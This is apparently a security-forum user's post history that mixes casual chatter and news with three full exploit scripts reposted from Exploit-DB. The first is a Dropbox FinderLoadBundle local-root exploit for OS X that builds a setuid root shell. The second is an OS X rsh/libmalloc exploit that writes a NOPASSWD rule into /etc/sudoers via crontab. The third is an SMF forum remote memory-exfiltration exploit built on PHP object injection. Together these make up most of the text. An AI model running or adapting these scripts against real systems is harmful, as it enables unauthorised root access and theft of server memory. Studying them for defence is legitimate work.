Everything posted by Nytro
-
[h=1]Dropbox < 3.3.x - OSX FinderLoadBundle Local Root Exploit[/h]

```bash
#!/bin/bash
# Exploit Title: Dropbox FinderLoadBundle OS X local root exploit
# Google Dork: N/A
# Date: 29/09/15
# Exploit Author: cenobyte
# Vendor Homepage: https://www.dropbox.com
# Software Link: N/A
# Version: Dropbox 1.5.6, 1.6-7.*, 2.1-11.*, 3.0.*, 3.1.*, 3.3.*
# Tested on: OS X Yosemite (10.10.5)
# CVE: N/A
#
# Dropbox FinderLoadBundle OS X local root exploit by cenobyte 2015
# <vincitamorpatriae@gmail.com>
#
# - vulnerability description:
# The setuid root FinderLoadBundle that was included in older DropboxHelperTools
# versions for OS X allows loading of dynamically linked shared libraries
# that are residing in the same directory. The directory in which
# FinderLoadBundle is located is owned by root and that prevents placing
# arbitrary files there. But creating a hard link from FinderLoadBundle to
# somewhere in a directory in /tmp circumvents that protection thus making it
# possible to load a shared library containing a payload which creates a root
# shell.
#
# - vulnerable versions:      | versions not vulnerable:
# Dropbox 3.3.* for Mac       | Dropbox 3.10.* for Mac
# Dropbox 3.1.* for Mac       | Dropbox 3.9.* for Mac
# Dropbox 3.0.* for Mac       | Dropbox 3.8.* for Mac
# Dropbox 2.11.* for Mac      | Dropbox 3.7.* for Mac
# Dropbox 2.10.* for Mac      | Dropbox 3.6.* for Mac
# Dropbox 2.9.* for Mac       | Dropbox 3.5.* for Mac
# Dropbox 2.8.* for Mac       | Dropbox 3.4.* for Mac
# Dropbox 2.7.* for Mac       | Dropbox 3.2.* for Mac
# Dropbox 2.6.* for Mac       | Dropbox 1.5.1-5 for Mac
# Dropbox 2.5.* for Mac       | Dropbox 1.4.* for Mac
# Dropbox 2.4.* for Mac       | Dropbox 1.3.* for Mac
# Dropbox 2.3.* for Mac       |
# Dropbox 2.2.* for Mac       |
# Dropbox 2.1.* for Mac       |
# Dropbox 1.7.* for Mac       |
# Dropbox 1.6.* for Mac       |
# Dropbox 1.5.6 for Mac       |
#
# The vulnerability was fixed in newer DropboxHelperTools versions as of 3.4.*.
# However, there is no mention of this issue at the Dropbox release notes:
# https://www.dropbox.com/release_notes
#
# It seems that one of the fixes implemented in FinderLoadBundle is a
# check whether the path of the bundle is a root owned directory making it
# impossible to load arbitrary shared libraries as a non-privileged user.
#
# I am not sure how to find the exact version of the FinderLoadBundle executable
# but the included Info.plist contained the following key:
# <key>CFBundleShortVersionString</key>
# This key is no longer present in the plist file of the latest version. So I
# included a basic vulnerable version checker that checks for the presence of
# this key.
#
# - exploit details:
# I wrote this on OS X Yosemite (10.10.5) but there are no OS specific features
# used. This exploit relies on Xcode for the shared library + root shell to be
# compiled. After successful exploitation a root shell is left in a directory in
# /tmp so make sure you delete it on your own system when you are done testing.
#
# - example:
# $ ./dropboxfinderloadbundle.sh
# Dropbox FinderLoadBundle OS X local root exploit by cenobyte 2015
#
# [-] creating temporary directory: /tmp/c7a15893fc1b28d31071c16c6663cbf3
# [-] linking /Library/DropboxHelperTools/Dropbox_u501/FinderLoadBundle
# [-] constructing bundle
# [-] creating /tmp/c7a15893fc1b28d31071c16c6663cbf3/boomsh.c
# [-] compiling root shell
# [-] executing FinderLoadBundle using root shell payload
# [-] entering root shell
# bash-3.2# id -P
# root:********:0:0::0:0:System Administrator:/var/root:/bin/sh

readonly __progname=$(basename $0)

errx() {
	echo "$__progname: $@" >&2
	exit 1
}

main() {
	local -r tmp=$(head -10 /dev/urandom | md5)
	local -r helpertools="/Library/DropboxHelperTools"
	local -r bundle="/tmp/$tmp/mach_inject_bundle_stub.bundle/Contents/MacOS"
	local -r bundletarget="$bundle/mach_inject_bundle_stub"
	local -r bundlesrc="${bundletarget}.c"
	local -r sh="/tmp/$tmp/boomsh"
	local -r shsrc="${sh}.c"
	local -r cfversion="CFBundleShortVersionString"
	local -r findbin="FinderLoadBundle"

	echo "Dropbox $findbin OS X local root exploit by cenobyte 2015"
	echo

	uname -v | grep -q ^Darwin || \
		errx "this Dropbox exploit only works on OS X"

	[ ! -d "$helpertools" ] && \
		errx "$helpertools does not exist"

	which -s gcc || \
		errx "gcc not found"

	found=0
	for finder in $(ls $helpertools/Dropbox_u*/$findbin); do
		stat -s "$finder" | grep -q "st_mode=0104"
		if [ $? -eq 0 ]; then
			found=1
			break
		fi
	done

	[ $found -ne 1 ] && \
		errx "couldn't find a setuid root $findbin"

	local -r finderdir=$(dirname $finder)
	local -r plist="${finderdir}/DropboxBundle.bundle/Contents/Info.plist"

	[ -f "$plist" ] || \
		errx "FinderLoadBundle not vulnerable (cannot open $plist)"

	grep -q "<key>$cfversion</key>" "$plist" || \
		errx "FinderLoadBundle not vulnerable (plist missing $cfversion)"

	echo "[-] creating temporary directory: /tmp/$tmp"
	mkdir /tmp/$tmp || \
		errx "couldn't create /tmp/$tmp"

	echo "[-] linking $finder"
	ln "$finder" "/tmp/$tmp/$findbin" || \
		errx "ln $finder /tmp/$tmp/$findbin failed"

	echo "[-] constructing bundle"
	mkdir -p "$bundle" || \
		errx "cannot create $bundle"

	echo "#include <sys/stat.h>" > "$bundlesrc"
	echo "#include <sys/types.h>" >> "$bundlesrc"
	echo "#include <stdlib.h>" >> "$bundlesrc"
	echo "#include <unistd.h>" >> "$bundlesrc"
	echo "extern void init(void) __attribute__ ((constructor));" >> "$bundlesrc"
	echo "void init(void)" >> "$bundlesrc"
	echo "{" >> "$bundlesrc"
	echo "	setuid(0);" >> "$bundlesrc"
	echo "	setgid(0);" >> "$bundlesrc"
	echo "	chown(\"$sh\", 0, 0);" >> "$bundlesrc"
	echo "	chmod(\"$sh\", S_ISUID|S_IRWXU|S_IXGRP|S_IXOTH);" >> "$bundlesrc"
	echo "}" >> "$bundlesrc"

	echo "[-] creating $shsrc"
	echo "#include <unistd.h>" > "$shsrc"
	echo "#include <stdio.h>" >> "$shsrc"
	echo "#include <stdlib.h>" >> "$shsrc"
	echo "int" >> "$shsrc"
	echo "main()" >> "$shsrc"
	echo "{" >> "$shsrc"
	echo "	setuid(0);" >> "$shsrc"
	echo "	setgid(0);" >> "$shsrc"
	echo "	system(\"/bin/bash\");" >> "$shsrc"
	echo "	return(0);" >> "$shsrc"
	echo "}" >> "$shsrc"

	echo "[-] compiling root shell"
	gcc "$shsrc" -o "$sh" || \
		errx "gcc failed for $shsrc"

	gcc -dynamiclib -o "$bundletarget" "$bundlesrc" || \
		errx "gcc failed for $bundlesrc"

	echo "[-] executing $findbin using root shell payload"
	cd "/tmp/$tmp"
	./$findbin mach_inject_bundle_stub.bundle 2>/dev/null 1>/dev/null
	[ $? -ne 4 ] && \
		errx "exploit failed, $findbin seems not vulnerable"

	[ ! -f "$sh" ] && \
		errx "$sh was not created, exploit failed"

	stat -s "$sh" | grep -q "st_mode=0104" || \
		errx "$sh was not set to setuid root, exploit failed"

	echo "[-] entering root shell"
	"$sh"
}

main "$@"

exit 0
```

Source: https://www.exploit-db.com/exploits/38360/
-
[h=1]Mac OS X 10.9.5 / 10.10.5 - rsh/libmalloc Privilege Escalation[/h]

```python
# CVE-2015-5889: issetugid() + rsh + libmalloc osx local root
# tested on osx 10.9.5 / 10.10.5
# jul/2015
# by rebel

import os,time,sys

env = {}
s = os.stat("/etc/sudoers").st_size
env['MallocLogFile'] = '/etc/crontab'
env['MallocStackLogging'] = 'yes'
env['MallocStackLoggingDirectory'] = 'a\n* * * * * root echo "ALL ALL=(ALL) NOPASSWD: ALL" >> /etc/sudoers\n\n\n\n\n'

sys.stderr.write("creating /etc/crontab..")

p = os.fork()

if p == 0:
    os.close(1)
    os.close(2)
    os.execve("/usr/bin/rsh",["rsh","localhost"],env)

time.sleep(1)

if "NOPASSWD" not in open("/etc/crontab").read():
    sys.stderr.write("failed\n")
    sys.exit(-1)

sys.stderr.write("done\nwaiting for /etc/sudoers to change (<60 seconds)..")

while os.stat("/etc/sudoers").st_size == s:
    sys.stderr.write(".")
    time.sleep(1)

sys.stderr.write("\ndone\n")
os.system("sudo su")
```

Source: https://www.exploit-db.com/exploits/38371/
-
Yes, we thought about some of them too, but I don't know who would have time for something like that...
-
Who will make a topic for each one (that doesn't already exist)?
-
I also looked for the Defcon ones, but I didn't find them. I recommend to everyone: "When IoT Attacks: Hacking A Linux-Powered Rifle"! It's fun. Want root on a gun? Watch the video.
-
I watched two of them last night: 1. Red Team vs Blue Team - Must watch! 2. Bypass Control Flow Guard - Good content, crap presentation. That Chinese guy's English is even worse than mine.
-
How did they appear so quickly? Should I download them before they get deleted (since they weren't uploaded by staff)?
-
[h=1]SMF (Simple Machine Forum) <= 2.0.10 - Remote Memory Exfiltration Exploit[/h]

```python
#!/usr/bin/python
# -*- coding: iso-8859-15 -*-
#############################################################################
# Title: SMF (Simple Machine Forum) <= 2.0.10 Remote Memory Exfiltration Exploit
# Authors: Andrea Palazzo
#          <andrea [dot] palazzo [at] truel [dot] it>
#          Filippo Roncari
#          <filippo [dot] roncari [at] truel [dot] it>
#          Truel Lab ~ http://lab.truel.it
# Requirements: SMF <= 2.0.10
#               PHP <= 5.6.11 / 5.5.27 / 5.4.43
# Advisories: TL-2015-PHP04 http://lab.truel.it/d/advisories/TL-2015-PHP04.txt
#             TL-2015-PHP06 http://lab.truel.it/d/advisories/TL-2015-PHP06.txt
#             TL-2015-SMF01 n/y/a
# Details: http://lab.truel.it/2015/09/php-object-injection-the-dirty-way/
# Demo: https://www.youtube.com/watch?v=dNRXTt7XQxs
############################################################################

import sys, requests, time, os, socket, thread, base64, string, urllib
from multiprocessing import Process

#Payload Config
bytes_num = 000   #num of bytes to dump
address = 000     #starting memory address

#Target Config
cookie = {'PHPSESSID' : '000'}                  #SMF session cookie
target_host = 'http://localhost/smf/index.php'  #URL of target installation index.php
csrftoken = ''

#Local Server Config
host = "localhost"
port = 31337

#Memory dump variables
dumped = ''
current_dump = ''
in_string = False
brute_index = 0
brute_list = list(string.ascii_letters + string.digits)

r_ok = 'HTTP/1.0 200 OK' + '\n'
r_re = 'HTTP/1.0 302 OK' + '\n'
r_body = '''Server: Truel-Server
Content-Type: text/xml
Connection: keep-alive
Content-Length: 395

<env:Envelope xmlns:env="http://www.w3.org/2003/05/soap-envelope">
 <env:Header>
  <n:alertcontrol xmlns:n="http://example.org/alertcontrol">
   <n:priority>1</n:priority>
   <n:expires>2001-06-22T14:00:00-05:00</n:expires>
  </n:alertcontrol>
 </env:Header>
 <env:Body>
  <m:alert xmlns:m="http://example.org/alert">
   <m:msg>Truel</m:msg>
  </m:alert>
 </env:Body>
</env:Envelope>'''

def serverStart():
    print "[+] Setting up local server on port " + str(port)
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    if not sock:
        print "[X] Fatal Error: Unable to create socket"
    sock.bind((host, port))
    sock.listen(1)
    return sock

def getToken():
    global csrftoken
    print "[+] Trying to get a valid CSRF token"
    for n in range(3): #3 attempts
        r = requests.get(target_host, cookies=cookie, allow_redirects=False)
        r = r.text
        if(r.find("action=logout;")!=-1):
            break
    start = r.find("action=logout;")
    if (start !=-1):
        end = (r[start+14:]).find('">')
        csrftoken = r[start+14 : start+end+14]
        print "[+] Authentication done. Got token " + str(csrftoken)
        return True
    else:
        print "[X] Fatal Error: You are not authenticated. Check the provided PHPSESSID."
        return False

def prepareForExploit():
    if not(getToken()): #get CSRF token
        os._exit(1)
    target = target_host + '?action=suggest&' + csrftoken + '&search_param=test'
    r = requests.get(target, cookies=cookie, allow_redirects=False) #necessary request
    return

def forgePayload(current_try, address):
    location = "http://" + current_try
    payload = 'O:12:"DateInterval":1:{s:14:"special_amount";O:9:"Exception":1:{s:19:"\x00Exception\x00previous";O:10:"SoapClient":5:{s:3:"uri";s:1:"a";s:8:"location";s:' + str(len(location)) + ':"' + location + '";s:8:"_cookies";a:1:{s:5:"owned";a:3:{i:0;s:1:"a";i:2;i:' + str(address) + ';i:1;i:' + str(address) + ';}}s:11:"_proxy_host";s:' + str(len(host)) + ':"' + str(host) + '";s:11:"_proxy_port";i:' + str(port) + ';}}}'
    return payload

def sendPayload(payload,null):
    target = target_host + '?action=suggest&' + csrftoken + '&search_param=' + (base64.b64encode(payload)) #where injection happens
    try:
        r = requests.get(target, cookies=cookie, allow_redirects=False)
    except requests.exceptions.RequestException:
        print "[X] Fatal Error: Unable to reach the remote host (Connection Refuse)"
        os._exit(1)
    return

def limitReached(dumped):
    if(len(dumped) >= bytes_num):
        return True
    else:
        return False

def printDumped(dumped):
    d = " "
    cnt = 1
    print "[+] " + str(len(dumped)) + " bytes dumped from " + target_host
    print "[+] ======================= Dumped Data ======================="
    for i in range(bytes_num):
        d = d + str(dumped[i])
        if (cnt % 48 == 0):
            print d
            d = " "
        if (cnt == bytes_num):
            print d
        cnt = cnt + 1

def getSoapRequest(sock):
    connection, sender = sock.accept()
    request = connection.recv(8192)
    return (connection, request)

def sendSoapResponse(connection, content):
    connection.send(content)
    connection.close()
    return

def getDumpedFromHost(request):
    i = request.find("Host: ") + 6
    v = request[i:i+1]
    return v

def pushDumped(value, string):
    global dumped
    global current_dump
    global brute_index
    global address
    global in_string
    dumped = str(value) + str(dumped)
    if(string):
        current_dump = str(value) + str(current_dump)
    else:
        current_dump = ""
    in_string = string
    address = address-1
    brute_index = 0
    print "[" + hex(address) + "] " + str(value)
    return

def bruteViaResponse(sock):
    global brute_index
    current_try = ""
    response_ok = r_ok + r_body
    for n in range(19):
        connection, request = getSoapRequest(sock)
        if not request:
            connection.close()
            return False
        if request.find("owned")!=-1:
            pushDumped(getDumpedFromHost(request), True)
            sendSoapResponse(connection,response_ok)
            return True
        else:
            if((brute_index+1) == len(brute_list)):
                sendSoapResponse(connection,response_ok)
                return False
            brute_index = brute_index + 1
            if not in_string:
                current_try = brute_list[brute_index]
            else:
                current_try = brute_list[brute_index] + str(current_dump)
            response_re = r_re + 'Location: http://' + str(current_try) + '\n' + r_body
            sendSoapResponse(connection,response_re)
    connection, request = getSoapRequest(sock)
    if request.find("owned")!=-1:
        pushDumped(getDumpedFromHost(request), True)
        sendSoapResponse(connection,response_ok)
        return True
    sendSoapResponse(connection,response_ok)
    return False

def bruteViaRequest(sock):
    global brute_index
    brute_index = 0
    current_try = ""
    while(True):
        if(brute_index == len(brute_list)):
            pushDumped(".", False)
        if limitReached(dumped):
            printDumped(dumped)
            return
        if not in_string:
            current_try = brute_list[brute_index]
        else:
            current_try = brute_list[brute_index] + str(current_dump)
        payload = forgePayload(current_try,address)
        thread.start_new_thread(sendPayload,(payload,""))
        if not bruteViaResponse(sock):
            brute_index = brute_index + 1
    return

def runExploit():
    print "[+] Starting exploit"
    sock = serverStart()
    prepareForExploit()
    print "[+] Trying to dump " + str(bytes_num) + " bytes from " + str(target_host)
    bruteViaRequest(sock)
    sock.close()
    print "[+] Bye ~ Truel Lab (http://lab.truel.it)"
    sys.exit(0)

runExploit()
```

Source: https://www.exploit-db.com/exploits/38304/
-
LinkOfDeath.com - when it will catch you it will kill you('r tab)
-
I got tired of how many times I banned the vn5socks guy, so I let him spam in one topic. Edit: I banned them, but I can already see new posts again in 2-3 hours. Eh, at least it helps with SEO. I think.
-
BitDefender Internet Security 2016 – 6 months FREE licence!
By Radu FaraVirusi(com) on September 21, 2015

BitDefender has launched the BitDefender 2016 product range, which brings a few notable changes. You can now get a FREE licence for 6 months for BitDefender Internet Security 2016.

Protection against ransomware-type malicious programs (which lock the PC and demand a ransom to unlock it) has been added – it provides a shield against unknown applications accessing personal documents. The BitDefender engine has been improved with a technology called "machine learning-based technologies", allowing it to detect new threats faster than ever. The firewall has been rewritten and has improved performance. Changes were also made to the password manager, parental control, file encryption and anti-theft modules.

To obtain the FREE licence go to the site: Get 6 Months Free Of Bitdefender! The Best Protection Against Cyber-Threats.

Source: BitDefender Internet Security 2016 – 6 luni licenta GRATUITA!
-
Let us know too if you find out more about the CERT event. Will it be technical? I think it will be "general information". The Provision one can be described in a single word: SALES. Owasp will be interesting.
-
Yes, it's not worth it. It's not for us.
-
9:2 A Sermon on Newton and Turing
9:3 Globalstar Satellite Communications
9:4 Keenly Spraying the Kernel Pools
9:5 The Second Underhanded Crypto Contest
9:6 Cross VM Communications
9:7 Antivirus Tumors
9:8 A Recipe for TCP/IPA
9:9 Mischief with AX.25 and APRS
9:10 Napravi i ti Računar „Galaksija“
9:11 Root Rights are a Grrl's Best Friend!
9:12 What If You Could Listen to This PDF?
9:13 Oona's Puzzle Corner!
Link: https://www.alchemistowl.org/pocorgtfo/pocorgtfo09.pdf
-
Android 5.x Lockscreen Bypass (CVE-2015-3860)
Posted on September 15, 2015 by jgor

A vulnerability exists in Android 5.x <= 5.1.1 (before build LMY48M) that allows an attacker to crash the lockscreen and gain full access to a locked device, even if encryption is enabled on the device. By manipulating a sufficiently large string in the password field when the camera app is active an attacker is able to destabilize the lockscreen, causing it to crash to the home screen. At this point arbitrary applications can be run or adb developer access can be enabled to gain full access to the device and expose any data contained therein.

September 2015: Elevation of Privilege Vulnerability in Lockscreen (CVE-2015-3860)

The attack requires the following criteria:
Attacker must have physical access to the device
User must have a password set (pattern / pin configurations do not appear to be exploitable)

Proof-of-concept – Nexus 4 factory image 5.1.1 (build LMY48I):

Source: Android 5.x Lockscreen Bypass (CVE-2015-3860) | UT Austin Information Security Office
-
You really love commenting nonsense... If you're not interested, don't post. Stick with McDonalds.
-
Yeah, that thing is neat, a fast web shell
-
You are za best! Thanks!
-
I don't know if this has been posted before: Criza refugiaților e de fapt o invazie musulmană organizată | NapocaNews
-
There will also be a web security workshop: https://www.owasp.org/index.php/OWASP_EEE_Bucharest_Event_2015#tab=Agenda If you are interested, or have friends who work in web, I recommend it.
-
Selling PSC accounts: Spain, Italy, France, Netherlands and UK
Nytro replied to Adriano2's topic in RST Market
That's what I'd like to understand too. What could I do with such an account?
-
My first Defcon experience

Defcon is a meta-conference which anyone passionate about IT security should attend. It is more than a conference, it is the heaven of hackers and security professionals, a place where you will definitely find something both cool and useful, whether you are interested in web security, reverse engineering, social engineering, hardware, lock-picking, Internet of Things or car-hacking topics.

Article: My first Defcon experience – Security Café

Some photos and opinions about the conference. Unfortunately, I didn't get to see everything that was there. I hope to make it next year too.
-
Finding SSL_Write Problems
Nytro replied to zabuz's topic in Reverse engineering & exploit development
Lame.
-
Kaspersky Antivirus, accused of having created fake malware
Nytro replied to daatdraqq's topic in Stiri securitate
If it's true, it's just one more reason to use it. Anyway, from their statements, I understood that various AV companies were using their signatures. They were stealing them. So it would seem to me like a brilliant revenge.